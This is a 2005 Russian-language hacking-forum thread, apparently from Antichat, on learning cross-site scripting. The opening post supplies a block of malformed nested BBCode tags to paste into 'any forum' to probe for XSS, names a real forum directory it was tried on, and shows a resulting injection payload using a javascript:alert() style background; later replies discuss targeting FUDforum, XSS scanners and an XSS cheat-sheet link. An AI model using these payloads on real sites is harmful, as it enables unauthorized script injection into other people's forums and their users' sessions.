Как научится Xss?

Discussion in 'Болталка' started by tys, 26 Nov 2005.

  1. tys

    tys Banned

    Joined:
    25 Nov 2005
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Как научится XSS?

    А вот так,

    Берем вот эту комбинацию, и суём на любой форум.



    HTML:
    [url]http://www.wj'"`.com[/url]
    [url=http://www.wj'"`.com]wj[/url]
    [email]wj@wj'"`.com[/email]
    [email=wj@wj'"`.com]wj[/email]
    [img]http://www.wj'"`.gif[/img]
    
    [url]http://www.wj1[url]http://www.wj1.com[/url].com[/url]
    [url=http://www.wj2[url]http://www.wj2.com[/url].com]wj2[/url]
    [email]wj3@wj3[url]http://www.wj3.com[/url].com[/email] 
    [email=wj4@wj4[url]http://www.wj4.com[/url].com]wj4[/email]
    [img]http://www.wj5[url]http://www.wj5.com[/url].gif[/img]
    
    [url]http://www.wj6[url=http://www.wj6.com]wj6[/url].com[/url]
    [url=http://www.wj7[url=http://www.wj7.com]wj7[/url].com]wj7[/url]
    [email]wj8@wj8[url=http://www.wj8.com]wj8[/url].com[/email]
    [email=wj9@wj9[url=http://www.wj9.com]wj9[/url].com]wj9[/email]
    [img]http://www.wj10[url=http://www.wj10.com]wj10[/url].gif[/img]
    
    [url]http://www.wj11[email][email protected][/email].com[/url]
    [url=http://www.wj12[email][email protected][/email].com]wj12[/url]
    [email]wj13@wj13[email][email protected][/email].com[/email]
    [email=wj14@wj14[email][email protected][/email].com]wj14[/email]
    [img]http://www.wj15[email][email protected][/email].gif[/img]
    
    [url]http://www.wj16[[email protected]]wj16[/email].com[/url]
    [url=http://www.wj17[[email protected]]wj17[/email].com]wj17[/url]
    [email]wj18@wj18[[email protected]]wj18[/email].com[/email]
    [email=wj19@wj19[[email protected]]wj19[/email].com]wj19[/email]
    [img]http://www.wj20[[email protected]]wj20[/email].gif[/img]
    
    [url]http://www.wj21[img]http://www.wj21.gif[/img].com[/url]
    [url=http://www.wj22[img]http://www.wj22.gif[/img].com]wj22[/url]
    [email]wj23@wj23[img]http://www.wj23.gif[/img].com[/email]
    [email=wj24@wj24[img]http://www.wj24.gif[/img].com]wj24[/email]
    [img]http://www.wj25[img]http://www.wj25.gif[/img].gif[/img]

    Вот результат,

    Иду по списку... :rolleyes:


    http://www.foruminsider.com/index.php?act=directory




    Alert.

    HTML:
    <dbml:font face="Edwardian "wj  style=display:none;background:url(javascript:alert())>
    Result.

    HTML:
    <FONT face="Edwardian "wj  style=display:none;background:url(javascript:alert())>


     
    #1 tys, 26 Nov 2005
    Last edited by a moderator: 27 Nov 2005
  2. africanec

    africanec Banned

    Joined:
    11 Sep 2005
    Messages:
    222
    Likes Received:
    14
    Reputations:
    -3
    wj FUDforum последний посмари !
     
  3. tys

    tys Banned

    Joined:
    25 Nov 2005
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    В смысле? О_о
     
  4. africanec

    africanec Banned

    Joined:
    11 Sep 2005
    Messages:
    222
    Likes Received:
    14
    Reputations:
    -3
    всысле на FUdforum просто сморю во всяких разных находишь может и там найдешь
    вот в таких fudforum.org/forum/
     
  5. africanec

    africanec Banned

    Joined:
    11 Sep 2005
    Messages:
    222
    Likes Received:
    14
    Reputations:
    -3
    wj мне ето негорит я просто предложил типа идей у тебя же рвения и знания полно
    а так я предпочитаю сам искать хоть долго зато понятно откуда и что
     
  6. Xex

    Xex Banned

    Joined:
    10 Jul 2005
    Messages:
    108
    Likes Received:
    41
    Reputations:
    7
    Кстати давно приходила мысль, а не заморочится ли кому нить написанием сканера XSS - уязвимостей, типа nmap...с пополнением базы данных...
     
  7. africanec

    africanec Banned

    Joined:
    11 Sep 2005
    Messages:
    222
    Likes Received:
    14
    Reputations:
    -3
    Xex
    они есть
     
  8. Xex

    Xex Banned

    Joined:
    10 Jul 2005
    Messages:
    108
    Likes Received:
    41
    Reputations:
    7
    смысли есть, но пока недоступны для общества?...
     
  9. africanec

    africanec Banned

    Joined:
    11 Sep 2005
    Messages:
    222
    Likes Received:
    14
    Reputations:
    -3
    всмысле недоступны у гугля их полно
     
  10. Tikson

    Tikson Elder - Старейшина

    Joined:
    9 Oct 2005
    Messages:
    263
    Likes Received:
    42
    Reputations:
    14
    ага там даже ссылка на главной странице есть, раздел "софт" =))
    tys молодец !!!
     
  11. De_X

    De_X Banned

    Joined:
    30 Nov 2005
    Messages:
    83
    Likes Received:
    7
    Reputations:
    2
    ИНТЕРЕСНО как начинающие это будут разбирать? :D
     
    #11 De_X, 3 Dec 2005
    Last edited by a moderator: 3 Dec 2005
  12. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    Я думаю, что у кого есть желание - тот поймет.
    Даны основные коды, и как они нарушают кол. Далее ты сам уже разбирайся, если нужно. Если нет, то обходи сосновым лесом. Вот и все.
     
  13. NaX[no]rT

    NaX[no]rT Members of Antichat

    Joined:
    3 Sep 2005
    Messages:
    489
    Likes Received:
    201
    Reputations:
    202
    как то раз выкладывалась интересная ссылка по XSS или меня клинит.
    Вот она http://ha.ckers.org/xss.html - рассмотрено уйма случаев
     
    _________________________
  14. Gosip

    Gosip Guest

    Reputations:
    0
    А почему тему перенесли из раздела Наши Статьи? :confused:
     
  15. Tikson

    Tikson Elder - Старейшина

    Joined:
    9 Oct 2005
    Messages:
    263
    Likes Received:
    42
    Reputations:
    14
    в точку а это все возможные варианты
    зы а я предпологал что имено так они и находятся втом смысле что я это уже гдето видел года 2 назат =)))